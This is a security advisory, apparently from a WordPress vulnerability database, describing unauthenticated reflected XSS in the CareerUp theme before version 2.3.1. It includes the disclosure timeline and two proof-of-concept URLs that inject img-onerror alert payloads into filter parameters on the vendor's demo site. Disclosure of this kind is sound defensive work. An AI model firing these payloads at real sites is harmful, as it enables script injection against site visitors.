CareerUp < 2.3.1 - Unauthenticated Reflected Cross-Site Scripting

2020-07-03T00:00:00
ID WPEX-ID:10289
Type wpexploit
Reporter Daniel Ruf
Modified 2020-07-04T05:00:06

Description

There are unauthenticated reflected Cross-Site Scripting (XSS) vulnerabilities in CareerUp theme, via the filter parameters. Edit (WPScanTeam) May 27th, 2020 - Vendor Contacted by Original Submitter. May 29th, 2020 - v2.3.0 Released. Unclear if issue fixed. June 18th, 2020 - Another submitter (Vlad Vector) reported the same issue. Report escalated to Envato June 18th, 2020 - v2.3.1 released. Issue confirmed to be fixed.

                                        
                                            https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&filter-center-location=&filter-center-latitude=&filter-center-longitude=&filter-distance=50

https://apusthemes.com/wp-demo/careerup/jobs/?filter-title=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS`)%3E&filter-center-location=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS2`)%3E&filter-distance=%22%3E%3Cimg%20src=x%20onerror=alert(`XSS3`)%3E